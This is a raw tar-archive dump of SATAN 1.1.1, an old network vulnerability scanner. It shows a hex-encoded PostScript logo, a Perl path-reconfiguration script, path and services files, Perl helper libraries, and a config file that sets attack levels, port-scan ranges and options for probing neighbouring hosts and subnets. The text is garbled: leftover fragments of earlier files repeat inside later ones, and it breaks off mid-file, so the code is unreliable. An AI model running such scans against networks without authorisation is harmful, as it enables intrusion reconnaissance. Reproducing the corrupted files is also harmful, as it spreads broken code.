0000000fffffffffffffffffffffffe0fffffffe0001fffff8000007fffffe00 f000ffff8000000003ffffffffffffffffffffffe0fffffffc0007ffffc00000 0ffffffe00e000ffffe600000000ffffffffffffffffffffffe0fffffffc0007 ffff8000001ff81ffe004000fffffff00000007fffffffffffffffffffffe0ff fffff0001fffff0000001fe000fe0000007ffffffc0000003fffffffffffffff ffffffe0fffffff0001ffffe0000001ff0000f0000007ffffffe0000001fffff ffffffffffffffffe0ffffffe0007fffff0000003ff0000f0000007ffffffff0 00000fffffffffffffffffffffe0ffffffe000ffffff0000003ff0000f000000 7ffffffff0000003ffffffffffffffffffffe0ffffffc001ffffffc000003fc0 000f0000007fffffffff800003ffffffffffffffffffffe0ffffff0003ffffff e07e003fc0000f0004003ffffffffff00001ffffffffffffffffffffe0fffffe 0007fffffffffe007fc00007001e003ffffffffff00000ffffffffffffffffff ffe0fffffe000ffffffffffc007f800007001e003ffffffffff000007fffffff ffffffffffffe0fffffe001ffffffffffc003f000007003e003ffffffffffc00 007fffffffffffffffffffe0fffffe003ffffff81ffc001f000007003f003fff fffffffe00003fffffffffffffffffffe0fffffc007ffffff001fc003f000007 003f001fffffffffff00001fffffffffffffffffffe0fffff8007fffffc0003e 003e002007003f001fffffffffff80001fffffffffffffffffffe0fffff800ff ffff00003f003e006007007f801fffffffffffe0000fffffffffffffffffffe0 fffff801ffffff00003f003e006007007f801fffffffffffe00007ffffffffff ffffffffe0fffff003fffffe00003f001e006003807f801ffffffffffff00003 ffffffffffffffffffe0fffff003fff3fe00003f001e00f003807f000fffffff fffff80003ffffffffffffffffffe0ffffe007ff03fc00003f001c00f003807f 800ffffffffffffc0001ffffffffffffffffffe0ffffe00fff83fc00001f001c 00f003807fc00fffffffffffff0001ffffffffffffffffffe0ffffc00ffe01f8 00001f801c00f803c03fe00fffffffffffff8000ffffffffffffffffffe0ffff 801ffc01f800001f801800f803c03f800fffffffffffff8000ffffffffffffff ffffe0ffff801ff800f800801f001800f803c03f800fffffffffffffc0007fff ffffffffffffffe0ffff003ff000f801801f801c00f801c03f8007ffffffffff ffe0007fffffffffffffffffe0fffe003fc000f001801f801c00f801803f8007 fffffffffffff0007fffffffffffffffffe0fffe007f80007003801f800c00f0 01c03f8007fffffffffffff0003fffffffffffffffffe0fffc007f0000700380 1f800c00f001c03f8007fffffffffffff8003fffffffffffffffffe0fffc00ff 00007007801f800400e000e03fe007fffffffffffffc003fffffffffffffffff e0fffc00ff0000f007801fc00c006000e03ff003fffffffffffffe001fffffff ffffffffffe0fff801fe0001c007c01fc00c004000e01ff003fffffffffffffe 000fffffffffffffffffe0fff803fc0003c007c01fc00c000000e01ff003ffff ffffffffff000fffffffffffffffffe0fff803fc0007c007c01fc00e000000f0 1ff803ffffffffffffff000fffffffffffffffffe0fff00ff8000f800fc00fc0 0e000000f01ffe0fffffffffffffff000fffffffffffffffffe0fff007f8001f 800fc00fc00e000000f03ffffffffe7fffffffffc00fffffffffffffffffe0ff e007f8003f000fc00fc00f000200fffffffffff00fffffffffc00fffffffffff ffffffe0ffe00ff8007f000f800fc00f000700fffffffffff007ffffffffe007 ffffffffffffffffe0ffe00ff000ff000f800fc00f000700fffffffffff800ff ffffffe003ffffffffffffffffe0ffc00ff000ff0007000fc00f800f007fffff fffff800fffffffff003ffffffffffffffffe0ffe00ffc00ff0006000fe00f80 0f00fffffffffff000fffffffff003ffffffffffffffffe0ffc00ffc007f8004 000fe00f001f007ffffffffff000fffffffff803ffffffffffffffffe0ffc01f fc003fc000000fc00fe03f807fffffffffe000fffffffff803ffffffffffffff ffe0ffc01ffe001fe000000fe00ff07fc0fffffffffff000fffffffff803ffff ffffffffffffe0ffc01fff000ff000000fe00ffffffffffff81ffff801ffffff fff801ffffffffffffffffe0ff803fff8007f000300ff00ffffffffffff87fff f001fffffffffc01ffffffffffffffffe0ff803fff8003f800700ff91fffffff ffffe07ffff001ffcffffffc01ffffffffffffffffe0ff803fff8001f800700f ffffffffffffffc03ffff001ff81fffffc01ffffffffffffffffe0ff803fff30 00fc00f00fffffffffffffffe01ffff801ff800ffffe01ffffffffffffffffe0 ff803ffff800fc00f00fffffffffffffffe00ffff001ff0007fffe01ffffffff ffffffffe0ff807fffe0007e01f80fffffffffffffffc007ffc001fc0003fffe 01ffffffffffffffffe0ff807fffe4007f03f80fffffffffffffffc007fff001 f80001fffe01ffffffffffffffffe0ff807ffffe007f07f80fffffffffffffff c007ff8001f80001fffe01ffffffffffffffffe0ff807ffffe007ffffc0fffff ffffffffffe00fffc001f80001fffe01ffffffffffffffffe0ff007ffffc007f ffffffffffffffffffffe00fffc003f00101fffe01ffffffffffffffffe0ff80 7ffffc007ffffffffffffffffffffff03fff0003f00101fffc01ffffffffffff ffffe0ff807ffff8007ffffffffffffffffff8fff81ffc0003f00301fffc01ff ffffffffffffffe0ff80fffff0007fffffffffffffffffc03ffe3ff80003e006 01fffc01ffffffffffffffffe0ff807fffe000ffffffffffffffffff801fffff 900003e00601fffc01ffffffffffffffffe0ff80ffffe000ffffffffffffffff ff001f81ff800003c00c01fffc03ffffffffffffffffe0ff007fff8001ffffff cffffffffffe000f007f000003c00c03fffc03ffffffffffffffffe0ff807fff 8001ffffff87fffffffff8000f003f000003800803fff803ffffffffffffffff e0ff807fff0003fffffe00fffffffff8000f001f000003800007fff003ffffff ffffffffffe0ff007fff0007fffffc00fffffffff8000f001f00000380000fff f003ffffffffffffffffe0ff007fff000ffffff800ffffffffe0000f001e0000 0380001fffe003ffffffffffffffffe0ff007fff001ffffff800780fffffe000 0f001e00000380001fffe003ffffffffffffffffe0ff007fff803ffffffe00f8 01ffffc0001f003e0020030000ffffc007ffffffffffffffffe0ff807fffc0ff fffffe00f001f03f80003f003c0060030007ffffe007ffffffffffffffffe0ff 803fffe1ffffffff81f001e01f8000fe003800e007001fffffe00fffffffffff ffffffe0ff803fffffffffffffc3f001800f0001fe003801e007003f7fffc00f ffffffffffffffffe0ff803fffffffffffffcff001000f0003fc007801e00700 7e3fffc00fffffffffffffffffe0ff803fffffffffffff8fe0000007000ffc00 7001800700fc07ffc01fffffffffffffffffe0ffc03ffffffffffffc07f00000 07000ffe007003c00700f803ffc01fffffffffffffffffe0ffc01fffffffffff f001f0000007001ffc007003c00700f803ff801fffffffffffffffffe0ffc01f fffffffffff800f0000007801ffe007003c007007001ff801fffffffffffffff ffe0ffe00ffffffffffff800f0000007801ffe007003c006004001ff003fffff ffffffffffffe0ffe00ffffffffffff000f0000007800ffc007003c006000003 ff803fffffffffffffffffe0ffe00ffffffffffff800f0000007c007fc007007 8007000007ff003fffffffffffffffffe0ffe007fffffffffff800f0000007e0 07fc0060078007000007fe007fffffffffffffffffe0ffe007fffffffffff800 f0006007f003fc00e007800780001ffe007fffffffffffffffffe0fff003ffff fffffff001f000e007f001fe00e007000fc0003ffe00ffffffffffffffffffe0 fff003fffffffffff001f001e007fc00f800c006000fe0007ffe00ffffffffff ffffffffe0fff801fffffffffff001f001e007fe00fc00e000000fe000fffc01 ffffffffffffffffffe0fff801fffffffffff001f003e007fe007c00e000000f f001fffc01ffffffffffffffffffe0fff800fffffffffff001e003e007ff003c 00f000000ffc03fff803ffffffffffffffffffe0fffc00fffffffffff001e003 e007fe003c00e000000ffffffff803ffffffffffffffffffe0fffc007fffffff fff001e007f007ff801c00f000200ffffffff807ffffffffffffffffffe0fffc 003ffffffffff001e007f003ff001c01f000600ffffffff007ffffffffffffff ffffe0fffe003fffffffffe003e007e003fe001c01f000c00ffffffff00fffff ffffffffffffffe0fffe001ffffffffff003e007e003fe001c01f800c00fffff ffe01fffffffffffffffffffe0ffff000fffffffffe003e00fe003fc001c01f8 01c00fffffffe01fffffffffffffffffffe0ffff000fffffffffe003e00fe003 e0003c01f803c01fffffffc03fffffffffffffffffffe0ffff8007fffffffff0 03f00f8003e0003c01fc07e01fffffff803fffffffffffffffffffe0ffff8003 ffffffffe003e00fc003e0003c01ffffc01fffffff007fffffffffffffffffff e0ffffc003ffffffffe003e00fe003e0007c01fffff01ffffffe00ffffffffff ffffffffffe0ffffc001ffffffffe003f00fe003c000fc03fffffc1ffffffe01 ffffffffffffffffffffe0ffffe000ffffffffe003f00fe001c000fc07ffffff fffffffc01ffffffffffffffffffffe0ffffe0007fffffffe003f00ff0018001 fffffffffffffffff003ffffffffffffffffffffe0fffff0003fffffffe007e0 0ff0018003ffffffffffffffffe003ffffffffffffffffffffe0fffff8001fff fffff007e00ff0018007ffffffffffffffffc007ffffffffffffffffffffe0ff fffc000ffffffff007f00ff801800fffffffffffffffff000fffffffffffffff ffffffe0fffffc0007ffffffe007f00ff801801fffffffffffffffff000fffff ffffffffffffffffe0fffffe0003ffffffe007f00ff801c03fffffffffffffff fe001fffffffffffffffffffffe0ffffff0001fffffff007fc1ff001e07fffff fffffffffff0003fffffffffffffffffffffe0ffffff0000fffffff007fffff8 01fffffffffffffffffff0007fffffffffffffffffffffe0ffffff80003fffff f00ffffffc01fffffffffffffffffff0007fffffffffffffffffffffe0ffffff c0001ffffff00ffffffe01ffffffffffffffffffe000ffffffffffffffffffff ffe0ffffffe0000ffffff00fffffff03ffffffffffffffffffc001ffffffffff ffffffffffffe0fffffff00007fffff80fffffffffffffffffffffffffffc001 ffffffffffffffffffffffe0fffffff00001fffffc0fffffffffffffffffffff ffffff8003ffffffffffffffffffffffe0fffffff80000ffffff1fffffffffff fffffffffffffffc0007ffffffffffffffffffffffe0fffffffc00003fffffff fffffffffffffffffffffffff8000fffffffffffffffffffffffe0fffffffe00 000fffffffffffffffffffffffffffffffe0001fffffffffffffffffffffffe0 ffffffff000007ffffffffffffffffffffffffffffffc0003fffffffffffffff ffffffffe0ffffffff800000fffffffffffffffffffffffffffffc0000ffffff ffffffffffffffffffe0ffffffffe000003ffffffffffffffffffffffffffff8 0001ffffffffffffffffffffffffe0fffffffff000000fffffffffffffffffff ffffffffe00003ffffffffffffffffffffffffe0fffffffff8000007ffffffff ffffffffffffffffff800007ffffffffffffffffffffffffe0fffffffffc0000 00fffffffffffffffffffffffffc00001fffffffffffffffffffffffffe0ffff fffffe0000003ffffffffffffffffffffffff000003fffffffffffffffffffff ffffe0ffffffffff80000007ffffffffffffffffffffff800000ffffffffffff ffffffffffffffe0ffffffffffc0000001ffffffffffffffffffffff000001ff ffffffffffffffffffffffffe0fffffffffff00000003fffffffffffffffffff f8000007ffffffffffffffffffffffffffe0fffffffffff00000000fffffffff ffffffffff8000000fffffffffffffffffffffffffffe0fffffffffffc000000 00fffffffffffffffff00000007fffffffffffffffffffffffffffe0ffffffff fffe000000001ffffffffffffff800000001ffffffffffffffffffffffffffff e0ffffffffffff8000000000fffffffffffc8000000007ffffffffffffffffff ffffffffffe0ffffffffffffe00000000007fffffff810000000001fffffffff ffffffffffffffffffffe0fffffffffffff000000000001fe07c000000000000 3fffffffffffffffffffffffffffffe0fffffffffffffc000000000000000000 0000000000ffffffffffffffffffffffffffffffe0ffffffffffffffc0000000 00000000000000000013ffffffffffffffffffffffffffffffe0ffffffffffff ffe00000000000000000000000007fffffffffffffffffffffffffffffffe0ff fffffffffffff8000000000000000000000001ffffffffffffffffffffffffff ffffffe0fffffffffffffffc000000000000000000000007ffffffffffffffff ffffffffffffffffe0ffffffffffffffff80000000000000000000003fffffff ffffffffffffffffffffffffffe0ffffffffffffffffe0000000000000000000 01ffffffffffffffffffffffffffffffffffe0ffffffffffffffffff80000000 00000000000fffffffffffffffffffffffffffffffffffe0ffffffffffffffff fff80000000000000000ffffffffffffffffffffffffffffffffffffe0ffffff ffffffffffffff800000000000000fffffffffffffffffffffffffffffffffff ffe0fffffffffffffffffffff0000000000000ffffffffffffffffffffffffff ffffffffffffe0ffffffffffffffffffffffe0000000007fffffffffffffffff ffffffffffffffffffffffe0ffffffffffffffffffffffffff00007fffffffff ffffffffffffffffffffffffffffffffe0ffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffe0ffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffe00000000000> def /satan {291 191 1 [ 291 0 0 -191 0 191 ] { data } image } def /dx .95 def /dy 1.490 def -.713 -3.13 translate satan dx 0 translate satan dx 0 translate satan dx 2 mul neg dy translate satan dx 0 translate satan dx 0 translate satan dx 2 mul neg dy translate satan dx 0 translate satan dx 0 translate satan dx 2 mul neg dy translate satan dx 0 translate satan dx 0 translate satan dx 2 mul neg dy translate satan dx 0 translate satan dx 0 translate satan %%/#copies 10 def showpage ffe003f00fe001c000fc07ffffff fffffffc01ffffffffffffffffffffe0ffffe0007fffffffe003f00ff0018001 fffffffffffffffff003ffffffffffffffffffffe0fffff0003fffffffe007e0 0ff0018003ffffffffffffffffe003ffffffffffffffffffffe0fffff8001fff fffff007e00ffsatan-1.1.1/reconfig................................................................................ 700 . 465 . 506 . 11217 5741756640 7451. ........................................................................................ ................................................................................................................................................................................................................................................................. ...........#!/bin/sh -- need to mention perl here to avoid recursion 'true' || eval 'exec perl -S $0 $argv:q'; eval '(exit $?0)' && eval 'exec perl -S $0 ${1+"$@"}' & eval 'exec /usr/local/bin/perl -S $0 $argv:q' .if 0; # # version 1, Sun Mar 26 18:31:28 1995, last mod by zen # # Usage: [perl] reconfig [file] # # This replaces the program paths (e.g. /bin/awk) in SATAN with an # alternate path that is found in the file "file.paths". It also finds # perl5 (or at least tries!) and changes the path in all the stand-alone # perl programs. # # all the HTML browsers we know about, IN ORDER OF PREFERENCE! @all_www= ("netscape", "Mosaic", "xmosaic", "lynx"); # # Potential directories to find commands; first, find the user's path... $PATH = $ENV{"PATH"}; # additional dirs; *COLON* separated! $other_dirs="/usr/ccs/bin:/bin:/usr/bin:/usr/ucb:/usr/bsd:/usr/ucb/bin:/usr/sbin:/usr/etc:/usr/local/bin:/usr/bin/X11:/usr/X11/bin:/usr/openwin/bin"; # # split into a more reasonable format. Personal aliases come last. @all_dirs = split(/:/, $other_dirs . ":" . $PATH); # # Target shell scripts in question: @shell_scripts=("config/paths.pl", "config/paths.sh"); @perl5_src = <bin/get_targets bin/faux_fping satan bin/*.satan perl/html.pl>; # # Target shell commands in question @all_commands=("cc", "cat", "chmod", "cmp", "comm", "cp", "date", "diff", ."egrep", "expr", "find", "grep", "ls", "mail", "mkdir", "mv", "rm", ."sed", "sh", "sort", "tftp", "touch", "uniq", "uudecode", "ypcat", ."strings", "finger", "ftp", "rpcinfo", "rusers", "showmount", "ping", ."ypwhich", "nslookup", "xhost", "su", "awk", "sed", "test", "whoami", ."basename", "echo", "file"); print "checking to make sure all the target(s) are here...\n"; for (@shell_scripts) { .die "ERROR -- $_ not found!\n" unless -f $_; .} # find perl5! print "Ok, trying to find perl5 now... hang on a bit...\n"; for $dir (@all_dirs) { .# first, find where it might be; oftentimes you'll see perl, .# perl4, perl5, etc. in the same dir .next if (! -d $dir); .while (<$dir/perl5* $dir/perl*>) { ..if (-x $_) { ...$perl_version=`($_ -v 2> /dev/null) | ....awk '/This is perl, version 5/ { print $NF }'`; ...if ($perl_version) { ....$PERL=$_; ....$pflag="1"; ....last; ....} ...} ...last if $pflag; ..} .last if $pflag; .} die "\nCan't find perl5! Bailing out...\n" unless $PERL; print "\nPerl5 is in $PERL\n"; for (@perl5_src) { $perl5_src .= "$_ "; } print "\nchanging the source in: $perl5_src\n"; system "$PERL -pi -e \"s@^#!.*/perl.*@#!$PERL@;\" $perl5_src"; # make sure things are executable... system("chmod u+x $perl5_src"); # find the most preferred www viewer first. for $www (@all_www) { .for $dir (@all_dirs) { ..if (!$MOSAIC) { ...if (-x "$dir/$www") { ....$MOSAIC="$dir/$www"; ....next; ....} ...} ..} .} if ($MOSAIC) { .print "\nHTML/WWW Browser is $MOSAIC\n"; .$upper{"MOSAIC"} = $MOSAIC; .} else { print "Cannot find a web browser! SATAN cannot be run except in CLI"; } print "\nSo far so good...\nLooking for all the commands now...\n"; for $command (@all_commands) { .$found=""; .for $dir (@all_dirs) { ..# special case rsh/remsh; if we can find remsh, ignore rsh ..if ($command eq "rsh") { ...# print "looking for rsh/remsh ($dir/$command)\n"; ...if (-f "$dir/remsh") { ....# this converts to upper case ....($upper = $command) =~ y/[a-z]/[A-Z]/; ....$found="true"; ....$upper{$upper} = "$dir/remsh"; ....print "found $dir/remsh; using this instead of rsh\n"; ....last; ....} ...} ..# if find the command in one of the directories, print string ..if (-f "$dir/$command") { ...# this converts to upper case ...($upper = $command) =~ y/[a-z]/[A-Z]/; ...$found="true"; ...$upper{$upper} = "$dir/$command"; ...# print "found ($upper) $dir/$command\n"; ...# if it's rsh we're examining, keep looking; else quit ...last unless $command eq "rsh"; ...} ..} .print "\nAEEEIIII...!!! can't find $command\n\n" unless $found; .} print "\nOk, now doing substitutions on the shell scripts...\n"; for $shell (@shell_scripts) { .print "Changing paths in $shell...\n"; .die "Can't open $shell\n" unless open(SCRIPT, $shell); .rename($shell, $shell . '.old'); .die "Can't open $shell\n" unless open(OUT, ">$shell"); .# .# Open up the script, search for lines beginning with .# stuff like "TEST", "AWK", etc. If the file ends in "pl", .# assume it's a perl script and change it accordingly .while (<SCRIPT>) { ..$found = 0; ..for $command (keys %upper) { ...if(/^\$?$command=/) { ....# shell script ....if ($shell !~ /.pl$/) { .....print OUT "$command=$upper{$command}\n"; .....} ....# perl script ....else { .....print OUT "\$" . "$command=\"$upper{$command}\";\n"; .....} ....$found = 1; ....} ...} ..print OUT $_ if !$found; ..} .close(SCRIPT); .close(OUT); .} # done... o make sure all the target(s) are here...\n"; for (@shell_scripts) { .die "ERROR -- $_ not found!\n" unless -f $_; .} # find perl5! print "Ok, trying to find perl5 now... hang on a bit...\n"; for $dir (@all_dirs) { .# first, find where it might be; oftentimes you'll see perl, .# perl4, perl5, etc. in the same dir .next if (! -d $dir); .while (<$dir/perl5* $dir/perlsatan-1.1.1/config/................................................................................. 700 . 465 . 506 . 0 5742521534 7056. ....................................................................... ................................................................................................................................................................................................................................................................. ............................satan-1.1.1/config/paths.pl......................................................................... 600 . 465 . 506 . 1142 5742457420 10621. ......................................................................... ................................................................................................................................................................................................................................................................. ..........................$FINGER="/usr/ucb/finger"; $FTP="/usr/ucb/ftp"; $RPCINFO="/usr/etc/rpcinfo"; $RUSERS="/usr/ucb/rusers"; $SHOWMOUNT="/usr/etc/showmount"; $YPWHICH="/bin/ypwhich"; $NSLOOKUP="/usr/etc/nslookup"; $XHOST="/usr/bin/X11/xhost"; $PING="/usr/etc/ping"; $MOSAIC="/usr/exp/bin/netscape"; $TCP_SCAN="bin/tcp_scan"; $UDP_SCAN="bin/udp_scan"; $FPING="bin/fping"; $NFS_CHK="bin/nfs-chk"; $YP_CHK="bin/yp-chk"; $SAFE_FINGER="bin/safe_finger"; $MD5="bin/md5"; $SYS_SOCKET="bin/sys_socket"; $BOOT="bin/boot"; $GET_TARGETS="bin/get_targets"; $TIMEOUT="bin/timeout"; $SATAN_CF="config/satan.cf"; $SERVICES="config/services"; mmand"; ...# print "found ($upper) $dir/$command\n"; ...# if it's rsh we're examining, keep looking; else quit ...last unless $command eq "rsh"; ...} ..} .print "\nAEEEIIII...!!! can't find $command\n\n" unless $found; .} print "\nOk, now doing substitutions on the shell scripts...\n"; for $shell (@shell_scripts) { .print "Changing paths in $shell...\n"; .die "Can't open $shell\n" unless open(SCRIPT, $shellsatan-1.1.1/config/paths.sh......................................................................... 600 . 465 . 506 . 330 5742457420 10576. ................................................ ................................................................................................................................................................................................................................................................. ...................................................BASENAME=/bin/basename CAT=/bin/cat ECHO=/bin/echo FILE=/bin/file RM=/bin/rm RSH=/usr/ucb/rsh SED=/bin/sed SU=/bin/su TEST=/bin/test TFTP=/usr/ucb/tftp WHOAMI=/usr/ucb/whoami GREP=/bin/grep REX=bin/rex RCMD=bin/rcmd ost"; $PING="/usr/etc/ping"; $MOSAIC="/usr/exp/bin/netscape"; $TCP_SCAN="bin/tcp_scan"; $UDP_SCAN="bin/udp_scan"; $FPING="bin/fping"; $NFS_CHK="bin/nfs-chk"; $YP_CHK="bin/yp-chk"; $SAFE_FINGER="bin/safe_finger"; $MD5="bin/md5"; $SYS_SOCKET="bin/sys_socket"; $BOOT="bin/boot"; $GET_TARGETS="bin/gsatan-1.1.1/config/satan.cf......................................................................... 600 . 465 . 506 . 6065 5740240116 10564. .................................................................................. ................................................................................................................................................................................................................................................................. .................# # Configuration file for satan; limits, policies, etc. go here # # # version 1, Mon Mar 20 19:16:55 1995, last mod by wietse # # # NOTE - "" or 0 means false, in this config file # # Where do we keep the data? This is just a default. $satan_data = "satan-data"; # Default attack level (0=light, 1=normal, 2=heavy). $attack_level = 0; # Probes by attack level. # # ? Means conditional, proposed by rules.todo. # With heavy scans, replace 1-9999 by 1-65535 to find all non-standard # telnet, ftp, www or gopher servers. @light = ( .'dns.satan', .'rpc.satan', .'showmount.satan?', .); @normal = ( .@light, .'finger.satan', .'tcpscan.satan 70,80,ftp,telnet,smtp,nntp,uucp,6000', .'udpscan.satan 53,177', .'rusers.satan?', .'boot.satan?', .'yp-chk.satan?', .); @heavy = ( .@normal, .$heavy_tcp_scan = 'tcpscan.satan 1-9999', .$heavy_udp_scan = 'udpscan.satan 1-2050,32767-33500', .'*?', .); # status file; keeps track of what SATAN is doing. $status_file = "status_file"; # # timeout values. -t option chooses one of these. # $short_timeout = 10; $med_timeout = 20; $long_timeout = 60; # # Some tools need more time, as specified in the timeouts array. # %timeouts = ( .'nfs-chk.satan', 120, .$heavy_tcp_scan, 120, .$heavy_udp_scan, 120, .); # what signal we send to nuke things when they timeout: $timeout_kill = 9; # # Proximity variables; how far out do we attack, does severity go down, etc. # # How far out from the original target do we attack? Zero means that we only # look at the hosts or network that you specify. One means look at neighboring # hosts, too. Anything over two is asking for problems, unless you are on the # inside of a firewall. $max_proximity_level = 0; # Attack level drops by this much each proximity level change $proximity_descent = 1; # when we go below zero attack, do we stop (0) or go on (1)? $sub_zero_proximity = 0; # a question; do we attack subnets when we nuke a target? # 0 = no; 1 = primary target subnet $attack_proximate_subnets = 0; # # Does SATAN run on an untrusted host? (0=no; 1=yes, this host may appear # in the rhosts, hosts.equiv or NFS export files of hosts that are being # probed). # $untrusted_host = 0; # # Any exceptions on who we want to hit? E.g., stay away from the mil sites? # Also, you can specify *only* hit sites of a certain type; e.g. edu sites. # # # If $only_attack_these is non-null, *only* hit sites if they are of this # type. You can specify a domain (podunk.edu) or network number # (192.9.9). You can specify a list of shell-like patterns with domains # or networks, separated by whitespace or commas. # # Examples: # # $only_attack_these = "podunk.edu"; # $only_attack_these = "192.9.9"; # $only_attack_these = "podunk.edu, 192.9.9"; # $only_attack_these = ""; # # Stay away from anyone that matches these patterns. # # Example - leave government and military sites alone: # # $dont_attack_these = "gov, mil"; $dont_attack_these = ""; # # Set the following to nonzero if DNS (internet name service) is unavailable. # $dont_use_nslookup = 0; # # Should SATAN ping hosts to see if they are alive? # $dont_use_ping = 0; 1; 'showmount.satan?', .); @normal = ( .@light, .'finger.satan', .'tcpscan.satan 70,80,ftp,telnet,smtp,nntp,uucp,6000', .'udpscan.satan 53,177', .'rusers.satan?', .'boot.satan?', .'yp-chk.satan?', .); @heavy = ( .@normal, .$heavy_tcp_scan = 'tcpscan.satan 1-9999', .$heavy_udp_scan = 'udpscan.satan 1-2050,32767-33500', .'*?', .); # status file; keeps track of what SATAN is doing. $status_file = "status_file"; # # timeout values. -t option chooses one satan-1.1.1/config/version.pl....................................................................... 600 . 465 . 506 . 105 5742520547 11146. ............................................................. ................................................................................................................................................................................................................................................................. ......................................# # current version of SATAN # $satan_version = "Version 1.1.1"; 1; ck_these = "podunk.edu"; # $only_attack_these = "192.9.9"; # $only_attack_these = "podunk.edu, 192.9.9"; # $only_attack_these = ""; # # Stay away from anyone that matches these patterns. # # Example - leave government and military sites alone: # # $dont_attack_these = "gov, mil"; $dont_attack_these = ""; # # Set the following to nonzero if DNS (internet name service) is unavailable. # $dont_use_nslookup = 0; # # Should SATAN ping hostssatan-1.1.1/config/services......................................................................... 600 . 465 . 506 . 4441 5742313324 10712. ............................................................................ ................................................................................................................................................................................................................................................................. ....................... tcpmux..1/tcp....# rfc-1078 echo..7/tcp echo..7/udp discard..9/tcp..sink null discard..9/udp..sink null systat..11/tcp..users daytime..13/tcp daytime..13/udp netstat..15/tcp chargen..19/tcp..ttytst source chargen..19/udp..ttytst source ftp-data.20/tcp fsp..21/udp ftp..21/tcp telnet..23/tcp smtp..25/tcp..mail time..37/tcp..timserver time..37/udp..timserver name..42/udp..nameserver whois..43/tcp..nicname..# usually to sri-nic domain..53/tcp domain..53/udp tftp..69/udp gopher..70/tcp rje..77/tcp finger..79/tcp http..80/tcp link..87/tcp..ttylink supdup..95/tcp hostnames.101/tcp..hostname.# usually to sri-nic iso-tsap.102/tcp x400..103/tcp....# ISO Mail x400-snd.104/tcp csnet-ns.105/tcp pop-2..109/tcp....# Post Office sunrpc..111/tcp sunrpc..111/udp auth..113/tcp....# RFC931 identity protocol sftp 115/tcp uucp-path.117/tcp nntp 119/tcp usenet..# Network News Transfer ntp..123/tcp....# Network Time Protocol netbios-ns 137/tcp NETBIOS Name Service netbios-ns 137/udp NETBIOS Name Service netbios-dgm 138/tcp NETBIOS Datagram Service netbios-dgm 138/udp NETBIOS Datagram Service netbios-ssn 139/tcp NETBIOS Session Service netbios-ssn 139/udp NETBIOS Session Service imap2 143/tcp NeWS..144/tcp..news..# Window System snmp 161/udp snmp-trap 162/udp snmptrap xdmcp..177/udp biff..512/udp..comsat exec..512/tcp login..513/tcp who..513/udp..whod shell..514/tcp..cmd..# no passwords used syslog..514/udp printer..515/tcp..spooler..# line printer spooler talk..517/udp ntalk..518/udp route..520/udp..router routed courier..530/tcp..rpc..# experimental uucp..540/tcp..uucpd..# uucp daemon klogin 543/tcp # Kerberos rlogin kshell 544/tcp krcmd # Kerberos remote shell new-rwho.550/udp..new-who..# experimental rmonitor.560/udp..rmonitord.# experimental monitor..561/udp....# experimental pcserver.600/tcp....# ECD Integrated PC board srvr kerberos 750/tcp kdc # Kerberos (server) tcp kerberos 750/udp kdc # Kerberos (server) udp krbupdate 760/tcp kreg # Kerberos registration kpasswd 761/tcp kpwd # Kerberos "passwd" ingreslock 1524/tcp eklogin 2105/tcp # Kerberos encrypted rlogin ftp 115/tcp uucp-path.117/tcp nntp 119/tcp usenet..# Network News Transfer ntp..123/tcp....# Network Time Protocol netbios-ns 137/tcp NETBIOS Name Service netbios-ns 137/udp NETsatan-1.1.1/perllib/................................................................................ 700 . 465 . 506 . 0 5742521534 7242. ....................................................................... ................................................................................................................................................................................................................................................................. ............................satan-1.1.1/perllib/ctime.pl........................................................................ 600 . 465 . 506 . 3253 5742456565 11005. ......................................................................... ................................................................................................................................................................................................................................................................. ..........................;# ctime.pl is a simple Perl emulation for the well known ctime(3C) function. ;# ;# Waldemar Kebsch, Federal Republic of Germany, November 1988 ;# kebsch.pad@nixpbe.UUCP ;# Modified March 1990, Feb 1991 to properly handle timezones ;# $RCSfile: ctime.pl,v $$Revision: 4.1 $$Date: 92/08/07 18:23:47 $ ;# Marion Hakanson (hakanson@cse.ogi.edu) ;# Oregon Graduate Institute of Science and Technology ;# ;# usage: ;# ;# #include <ctime.pl> # see the -P and -I option in perl.man ;# $Date = &ctime(time); CONFIG: { package ctime; @DoW = ('Sun','Mon','Tue','Wed','Thu','Fri','Sat'); @MoY = ('Jan','Feb','Mar','Apr','May','Jun', . 'Jul','Aug','Sep','Oct','Nov','Dec'); } sub ctime { package ctime; local($time) = @_; local($[) = 0; local($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst); # Determine what time zone is in effect. # Use GMT if TZ is defined as null, local time if TZ undefined. # There's no portable way to find the system default timezone. $TZ = defined($ENV{'TZ'}) ? ( $ENV{'TZ'} ? $ENV{'TZ'} : 'GMT' ) : ''; ($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst) = ($TZ eq 'GMT') ? gmtime($time) : localtime($time); # Hack to deal with 'PST8PDT' format of TZ # Note that this can't deal with all the esoteric forms, but it # does recognize the most common: [:]STDoff[DST[off][,rule]] if($TZ=~/^([^:\d+\-,]{3,})([+-]?\d{1,2}(:\d{1,2}){0,2})([^\d+\-,]{3,})?/){ $TZ = $isdst ? $4 : $1; } $TZ .= ' ' unless $TZ eq ''; $year += 1900; sprintf("%s %s %2d %2d:%02d:%02d %s%4d\n", $DoW[$wday], $MoY[$mon], $mday, $hour, $min, $sec, $TZ, $year); } 1; vel drops by this much each proximity level change $proximity_descent = 1; # when we go below zero attack, do we stop (0) or go on (1)? $sub_zero_proximity = 0; # a question; do we attack subnets when we nuke a target? # 0 = no; 1 = primary target subnet $attack_proximate_subnets = 0; # # Does SATAN run on an untrusted host? (0=no; 1=yesatan-1.1.1/perllib/getopts.pl...................................................................... 600 . 465 . 506 . 1673 5742456565 11375. ................................................... ................................................................................................................................................................................................................................................................. ................................................;# getopts.pl - a better getopt.pl ;# Usage: ;# do Getopts('a:bc'); # -a takes arg. -b & -c not. Sets opt_* as a ;# # side effect. sub Getopts { local($argumentative) = @_; local(@args,$_,$first,$rest); local($errs) = 0; local($[) = 0; @args = split( / */, $argumentative ); while(@ARGV && ($_ = $ARGV[0]) =~ /^-(.)(.*)/) { .($first,$rest) = ($1,$2); .$pos = index($argumentative,$first); .if($pos >= $[) { . if($args[$pos+1] eq ':') { ..shift(@ARGV); ..if($rest eq '') { .. ++$errs unless @ARGV; .. $rest = shift(@ARGV); ..} ..eval "\$opt_$first = \$rest;"; . } . else { ..eval "\$opt_$first = 1"; ..if($rest eq '') { .. shift(@ARGV); ..} ..else { .. $ARGV[0] = "-$rest"; ..} . } .} .else { . print STDERR "Unknown option: $first\n"; . ++$errs; . if($rest ne '') { ..$ARGV[0] = "-$rest"; . } . else { 